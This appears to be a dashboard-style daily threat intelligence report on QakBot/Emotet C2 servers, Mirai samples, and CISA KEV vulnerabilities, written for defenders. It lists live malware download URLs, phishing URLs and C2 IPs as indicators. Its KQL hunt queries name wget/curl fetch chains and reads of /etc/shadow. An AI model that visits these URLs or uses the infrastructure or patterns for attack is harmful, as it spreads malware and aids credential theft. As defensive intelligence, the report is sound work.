โ† Back to Dashboard
May 14, 2026

Daily Threat Intelligence Report โ€” 2026-05-14

25
IOCs
12
TTPs
12
KQL Queries
Executive Summary

Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed by Feodotracker across US, UK, and Japan nodes, alongside a surge in Mirai botnet ELF samples and an AsyncRAT trojan tracked in MalwareBazaar. CISA has added five critical vulnerabilities to the Known Exploited Vulnerabilities catalog, including a Palo Alto Networks PAN-OS out-of-bounds write (CVE-2026-0300) allowing unauthenticated root-level RCE and a cPanel authentication bypass (CVE-2026-41940), both requiring immediate patching. AlienVault OTX reports active Kimsuky APT activity leveraging a CHM dropper and three-stage PowerShell kill chain, with 38 IOCs published. SOC teams should immediately block all five Feodotracker C2 IPs, apply CISA KEV patches on an emergency basis, and hunt for AsyncRAT and Mirai indicators across Linux and Windows endpoints.

#1

Active QakBot and Emotet C2 Infrastructure โ€” Multi-Region Banking Trojan Campaign

CRITICAL TA505

Feodotracker has confirmed four active QakBot C2 servers and one Emotet C2 server operational within the last 24 hours, spanning infrastructure in the United States (50.16.16.211, 34.204.119.63, 162.243.103.246), United Kingdom (178.62.3.223), and Japan (27.133.154.218). QakBot and Emotet are historically associated with TA505 operations and serve as primary delivery mechanisms for ransomware payloads including Cl0p and Dridex. The geographic distribution across three countries suggests deliberate infrastructure diversification to evade regional blocklists and maintain persistence. Organizations with financial sector exposure or unpatched Windows endpoints should treat these C2 IPs as high-priority blocking targets and hunt for beaconing activity immediately.

๐Ÿ”ด Indicators of Compromise
IP 162.243.103.246 Emotet C2 server โ€” US-hosted, Feodotracker confirmed active within 24h
IP 50.16.16.211 QakBot C2 server โ€” US-hosted, Feodotracker confirmed active within 24h
IP 34.204.119.63 QakBot C2 server โ€” US-hosted (AWS range), Feodotracker confirmed active within 24h
IP 178.62.3.223 QakBot C2 server โ€” UK-hosted (DigitalOcean range), Feodotracker confirmed active within 24h
IP 27.133.154.218 QakBot C2 server โ€” Japan-hosted, Feodotracker confirmed active within 24h
๐ŸŸฃ MITRE ATT&CK TTPs
T1566.001 Spearphishing Attachment MITRE โ†’
T1071.001 Application Layer Protocol โ€” Web Protocols C2 MITRE โ†’
T1105 Ingress Tool Transfer MITRE โ†’
T1078 Valid Accounts MITRE โ†’
๐ŸŸข Hunt Queries
MDE Hunt for C2 connections to QakBot and Emotet infrastructure

Detects outbound connections to all five Feodotracker-confirmed QakBot and Emotet C2 servers active in the last 24 hours.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, LocalIP, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect QakBot/Emotet beaconing โ€” periodic connection pattern analysis

Identifies hosts with repetitive, periodic connections to QakBot/Emotet C2 IPs indicative of malware beaconing behavior.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| summarize ConnectionCount=count(), FirstSeen=min(TimeGenerated), LastSeen=max(TimeGenerated), Ports=make_set(RemotePort) by DeviceName, RemoteIP, InitiatingProcessFileName
| where ConnectionCount > 3
| extend DurationMinutes = datetime_diff('minute', LastSeen, FirstSeen)
| order by ConnectionCount desc
MDI Detect lateral movement following QakBot credential theft

Hunts for suspicious NTLM authentication patterns from hosts that may be QakBot-compromised, consistent with TA505 lateral movement TTPs.

IdentityLogonEvents
| where TimeGenerated > ago(24h)
| where ActionType == 'LogonSuccess'
| where Protocol == 'Ntlm'
| summarize LogonCount=count(), DistinctTargets=dcount(DeviceName), TargetDevices=make_set(DeviceName) by AccountDisplayName, IPAddress
| where LogonCount > 5 or DistinctTargets > 3
| order by LogonCount desc
SENTINEL QakBot and Emotet C2 traffic โ€” perimeter firewall and proxy detection

Identifies outbound traffic to Feodotracker-confirmed C2 IPs across all network security log sources ingested into Sentinel.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in ('162.243.103.246', '50.16.16.211', '34.204.119.63', '178.62.3.223', '27.133.154.218')
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor, DeviceProduct
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all five Feodotracker C2 IPs (162.243.103.246, 50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) at perimeter firewall, proxy, and DNS sinkholes
โ†’ IMMEDIATE: Run the MDE KQL beaconing query to identify any hosts currently communicating with QakBot/Emotet C2 infrastructure and isolate confirmed compromised devices
โ†’ IMMEDIATE: Submit all five C2 IPs to EDR platform threat intelligence feeds for automated blocking of any process attempting outbound connection
โ†’ SHORT-TERM: Execute the MDI NTLM lateral movement query to identify potential credential-theft-driven lateral movement originating from QakBot-infected hosts
โ†’ SHORT-TERM: Review email gateway quarantine logs for macro-enabled Office documents and HTML smuggling attachments delivered in the past 72 hours
โ†’ SHORT-TERM: Enable enhanced logging on all endpoints for network connection events, ensuring RemoteIP and InitiatingProcessCommandLine fields are captured
โ†’ LONG-TERM: Implement network segmentation to limit lateral movement capability if QakBot achieves initial foothold; enforce NTLM relay mitigations (SMB signing, LDAP signing)
โ†’ LONG-TERM: Subscribe to Feodotracker automated feeds for daily C2 IP blocklist updates via TAXII/STIX or direct download integration into NGFW
#2

Mirai Botnet Resurgence โ€” Four New ELF Samples and Active Linux Malware Download Infrastructure

HIGH Unknown Threat Actor

MalwareBazaar has catalogued four new Mirai ELF binary samples within the past 24 hours (hashes: 775042943516f540da439945aa5fb43b296892b8211699cbd8c0610d5dc09b0f, ff1aa2a8e6fb56a6a5e43ee8ab77017454160b406003d1ee758f465afd225b60, 6abcb230fb1233ce9b56099a94a19c35c7ca199667130970edc47691f3fd3709, bd62de3c345b01497d327c369bf335cb48b66ba2a117a850081130a8a7f91152), indicating active botnet build-out or refresh of Mirai variant infrastructure. URLhaus concurrently tracks five active malware download URLs delivering shell scripts (bin.sh) and unclassified payloads from IPs spanning multiple countries, consistent with Mirai's known propagation methodology of exploiting weak SSH/Telnet credentials and vulnerable IoT/Linux services. The simultaneous appearance of four distinct ELF samples alongside active download infrastructure suggests a coordinated Mirai operator campaign targeting Linux servers and IoT devices. Organizations running internet-exposed Linux systems, routers, NVRs, or IoT devices should conduct immediate inventory and credential review.

๐Ÿ”ด Indicators of Compromise
HASH 775042943516f540da439945aa5fb43b296892b8211699cbd8c0610d5dc09b0f Mirai ELF binary โ€” MalwareBazaar confirmed, tagged elf+Mirai
HASH ff1aa2a8e6fb56a6a5e43ee8ab77017454160b406003d1ee758f465afd225b60 Mirai ELF binary โ€” MalwareBazaar confirmed, tagged elf+Mirai
HASH 6abcb230fb1233ce9b56099a94a19c35c7ca199667130970edc47691f3fd3709 Mirai ELF binary โ€” MalwareBazaar confirmed, tagged elf+Mirai
HASH bd62de3c345b01497d327c369bf335cb48b66ba2a117a850081130a8a7f91152 Mirai ELF binary โ€” MalwareBazaar confirmed, tagged elf+Mirai
URL http://175.174.105.125:44962/bin.sh Active Mirai/malware download staging URL serving shell script payload โ€” URLhaus confirmed
URL http://188.149.206.91:59551/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed
URL http://113.237.44.254:54019/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed
URL http://125.44.46.158:59841/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed
URL http://123.4.196.139:57224/bin.sh Active malware download URL serving shell script โ€” URLhaus confirmed
HASH c52f07795607c12042cdff7cb2a29cdbbac6f40828495eb90659165a330a6ef7 AsyncRAT ELF/EXE botnet trojan โ€” MalwareBazaar confirmed, tagged AsyncRAT+botnet+c2+trojan
๐ŸŸฃ MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE โ†’
T1059.004 Unix Shell MITRE โ†’
T1498 Network Denial of Service MITRE โ†’
T1105 Ingress Tool Transfer MITRE โ†’
๐ŸŸข Hunt Queries
MDE Hunt for Mirai ELF sample execution by file hash

Detects execution or file creation events matching confirmed Mirai ELF binary hashes from MalwareBazaar.

DeviceFileEvents
| where TimeGenerated > ago(24h)
| where SHA256 in (
    '775042943516f540da439945aa5fb43b296892b8211699cbd8c0610d5dc09b0f',
    'ff1aa2a8e6fb56a6a5e43ee8ab77017454160b406003d1ee758f465afd225b60',
    '6abcb230fb1233ce9b56099a94a19c35c7ca199667130970edc47691f3fd3709',
    'bd62de3c345b01497d327c369bf335cb48b66ba2a117a850081130a8a7f91152'
)
| project TimeGenerated, DeviceName, FileName, FolderPath, SHA256, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
MDE Detect connections to Mirai malware download staging servers

Identifies outbound connections to URLhaus-confirmed Mirai payload staging IPs and non-standard high ports used for bin.sh delivery.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteIP in ('175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
   or RemotePort in (44962, 59551, 54019, 59841, 57224)
| where ActionType == 'ConnectionSuccess'
| project TimeGenerated, DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessParentFileName
| order by TimeGenerated desc
MDE Detect shell script download and execute pattern โ€” Mirai propagation chain

Hunts for wget/curl downloading shell scripts from non-standard high ports followed by chmod or bash execution, consistent with Mirai's bin.sh propagation methodology.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where FileName in ('wget', 'curl', 'bash', 'sh')
| where ProcessCommandLine has_any ('bin.sh', '44962', '59551', '54019', '59841', '57224', '175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL Mirai staging server traffic โ€” proxy and firewall detection

Identifies all traffic to URLhaus-confirmed Mirai download staging servers across network perimeter logs.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DestinationIP in ('175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
   or RequestURL has_any ('bin.sh', '175.174.105.125', '188.149.206.91', '113.237.44.254', '125.44.46.158', '123.4.196.139')
| project TimeGenerated, SourceIP, DestinationIP, DestinationPort, RequestURL, Activity, DeviceVendor
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Block all five URLhaus malware download staging IPs (175.174.105.125, 188.149.206.91, 113.237.44.254, 125.44.46.158, 123.4.196.139) and associated high ports at perimeter firewall
โ†’ IMMEDIATE: Submit all four Mirai ELF hashes to EDR/AV platforms for immediate blocking and retrospective scan across all Linux endpoints
โ†’ IMMEDIATE: Conduct emergency audit of internet-exposed SSH/Telnet services; enforce key-based authentication and disable password authentication on all Linux servers
โ†’ IMMEDIATE: Check AsyncRAT hash (c52f07795607c12042cdff7cb2a29cdbbac6f40828495eb90659165a330a6ef7) against EDR telemetry for any execution events
โ†’ SHORT-TERM: Deploy the MDE KQL queries for Mirai ELF hash detection and staging server connections across all Linux and hybrid endpoints enrolled in MDE
โ†’ SHORT-TERM: Review IoT device inventory; apply firmware updates and change all default credentials on routers, NVRs, cameras, and embedded Linux devices
โ†’ SHORT-TERM: Implement egress filtering to block outbound connections on non-standard high ports (>1024) from Linux servers unless explicitly required
โ†’ LONG-TERM: Integrate URLhaus automated blocklist feeds into NGFW and DNS filtering to receive real-time updates on Mirai staging infrastructure
#3

Critical CISA KEV Additions โ€” PAN-OS RCE, Ivanti EPMM, cPanel Auth Bypass, Linux Kernel Privilege Escalation, and LiteLLM SQL Injection Actively Exploited

MEDIUM Unknown Threat Actor

CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalog today, all requiring immediate action. The most critical is CVE-2026-0300 affecting Palo Alto Networks PAN-OS, an out-of-bounds write in the User-ID Authentication Portal enabling unauthenticated root-level remote code execution on PA-Series and VM-Series firewalls โ€” patches are available as of 2026-05-13. CVE-2026-41940 affects WebPros cPanel & WHM and WP2, allowing unauthenticated remote attackers to bypass authentication entirely and access the hosting control panel. CVE-2026-6973 in Ivanti EPMM allows authenticated remote administrators to achieve RCE, while CVE-2026-31431 in the Linux Kernel enables local privilege escalation, and CVE-2026-42208 in BerriAI LiteLLM exposes a SQL injection risk in AI proxy infrastructure. AlienVault OTX additionally reports an Adobe Reader zero-day exploited since at least December 2025, further expanding the vulnerability exploitation surface. Organizations must prioritize emergency patching of PAN-OS and cPanel given the unauthenticated attack vectors.

๐Ÿ”ด Indicators of Compromise
CVE CVE-2026-0300 Palo Alto Networks PAN-OS โ€” Out-of-bounds write in User-ID Authentication Portal, unauthenticated RCE with root privileges on PA-Series and VM-Series firewalls. Patches released 2026-05-13.
CVE CVE-2026-41940 WebPros cPanel & WHM and WP2 โ€” Authentication bypass in login flow, unauthenticated remote attackers gain full control panel access.
CVE CVE-2026-6973 Ivanti Endpoint Manager Mobile (EPMM) โ€” Improper input validation allowing remotely authenticated administrator to achieve RCE.
CVE CVE-2026-31431 Linux Kernel โ€” Incorrect resource transfer between spheres enabling local privilege escalation.
CVE CVE-2026-42208 BerriAI LiteLLM โ€” SQL injection allowing unauthenticated read and potential modification of AI proxy database and managed credentials.
URL https://meta-data-shredding-cleanup-utility.wiki/8f17c972-8dcd-48e2-9699-dd33797c674c/google.ct Active malware download URL using deceptive wiki domain โ€” URLhaus confirmed malware_download
URL https://remote-sensor-proxy-tunnel-config.wiki/38435a52-4879-40be-aba3-b5f64322ae6a/google.ct Active malware download URL using deceptive wiki domain with UUID path โ€” URLhaus confirmed malware_download
URL https://instagram.wtcx.lol/VMdfpJbTim Active Instagram credential phishing URL โ€” OpenPhish confirmed
URL https://registra-2026-credi-demon.vercel.app/ Active financial credential phishing lure hosted on Vercel โ€” OpenPhish confirmed
URL https://next-netflix-23rd-kappa.vercel.app/detail/931285?type=movie Active Netflix credential phishing page hosted on Vercel โ€” OpenPhish confirmed
๐ŸŸฃ MITRE ATT&CK TTPs
T1190 Exploit Public-Facing Application MITRE โ†’
T1068 Exploitation for Privilege Escalation MITRE โ†’
T1190 Exploit Public-Facing Application โ€” SQL Injection MITRE โ†’
T1566.002 Spearphishing Link MITRE โ†’
๐ŸŸข Hunt Queries
MDE Detect access to CISA KEV phishing and malware download infrastructure

Identifies endpoint connections to URLhaus malware download URLs and OpenPhish confirmed phishing domains added in the last 24 hours.

DeviceNetworkEvents
| where TimeGenerated > ago(24h)
| where RemoteUrl has_any (
    'meta-data-shredding-cleanup-utility.wiki',
    'remote-sensor-proxy-tunnel-config.wiki',
    'instagram.wtcx.lol',
    'registra-2026-credi-demon.vercel.app',
    'next-netflix-23rd-kappa.vercel.app',
    '9xbc3jzp.disorientbreak.digital',
    'blockbook-tls-1.nodes.zelcore.io'
)
| project TimeGenerated, DeviceName, AccountName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
SENTINEL PAN-OS CVE-2026-0300 exploitation attempt detection โ€” User-ID Portal anomalies

Hunts for anomalous inbound requests to PAN-OS User-ID Authentication Portal that may indicate CVE-2026-0300 exploitation attempts.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where DeviceVendor == 'Palo Alto Networks'
| where Activity has_any ('captive-portal', 'user-id', 'auth-portal', 'authentication')
| where Reason has_any ('malformed', 'invalid', 'overflow', 'exception') or Message has_any ('out-of-bounds', 'segfault', 'crash')
| project TimeGenerated, SourceIP, DestinationIP, Activity, Reason, Message, DeviceProduct
| order by TimeGenerated desc
SENTINEL cPanel CVE-2026-41940 authentication bypass โ€” unauthorized access detection

Detects potential authentication bypass exploitation of CVE-2026-41940 in cPanel WHM by identifying successful logins without prior authentication challenge completion.

CommonSecurityLog
| where TimeGenerated > ago(24h)
| where RequestURL has_any ('cpanel', 'whm', 'webmail', 'cPanel')
| where Activity has_any ('login', 'auth', 'session')
| summarize LoginCount=count(), SourceIPs=make_set(SourceIP) by DestinationIP, RequestURL, bin(TimeGenerated, 1h)
| where LoginCount > 10
| order by LoginCount desc
MDE Linux Kernel CVE-2026-31431 privilege escalation โ€” post-exploitation detection

Hunts for Linux process privilege escalation patterns consistent with CVE-2026-31431 exploitation, specifically non-root processes spawning root-privileged children.

DeviceProcessEvents
| where TimeGenerated > ago(24h)
| where Platform == 'Linux'
| where AccountName != 'root' and AccountName != 'SYSTEM'
| where InitiatingProcessAccountName != 'root'
| where FileName in ('bash', 'sh', 'python', 'python3', 'perl')
| where ProcessCommandLine has_any ('chmod +s', 'chown root', 'setuid', '/etc/passwd', '/etc/shadow', 'sudo -i', 'su root')
| project TimeGenerated, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessAccountName
| order by TimeGenerated desc
โœ… Recommended Actions
โ†’ IMMEDIATE: Apply Palo Alto Networks patches for CVE-2026-0300 released 2026-05-13; as interim workaround restrict User-ID Authentication Portal access to trusted zones only and disable if not required
โ†’ IMMEDIATE: Apply vendor patches for CVE-2026-41940 in cPanel WHM and WP2; if patches unavailable, implement network-level access controls restricting WHM/cPanel access to authorized management IPs only
โ†’ IMMEDIATE: Patch Ivanti EPMM for CVE-2026-6973; review EPMM admin account list for unauthorized privileged accounts and rotate all administrative credentials
โ†’ IMMEDIATE: Apply Linux Kernel patches for CVE-2026-31431 across all Linux servers; prioritize internet-facing and production systems; audit sudoers configuration for unnecessary privileges
โ†’ IMMEDIATE: Patch or disable BerriAI LiteLLM if CVE-2026-42208 patches are unavailable; rotate all AI API credentials (OpenAI, Anthropic, etc.) managed by any LiteLLM proxy instance
โ†’ IMMEDIATE: Block OpenPhish-confirmed phishing domains at DNS and proxy layer, particularly Vercel-hosted Netflix and Instagram lures targeting employee credentials
โ†’ IMMEDIATE: Block URLhaus deceptive .wiki download domains (meta-data-shredding-cleanup-utility.wiki, remote-sensor-proxy-tunnel-config.wiki) at DNS and proxy
โ†’ SHORT-TERM: Run the Sentinel and MDE KQL queries for CVE-2026-0300, CVE-2026-41940, and CVE-2026-31431 exploitation indicators across all relevant infrastructure
โ†’ SHORT-TERM: Alert SOC Tier 2 to treat any PAN-OS authentication portal anomaly as high-severity incident pending patch application given active exploitation in wild
โ†’ LONG-TERM: Establish automated CISA KEV monitoring with 24-hour SLA for patch assessment and 72-hour SLA for patch application on internet-facing systems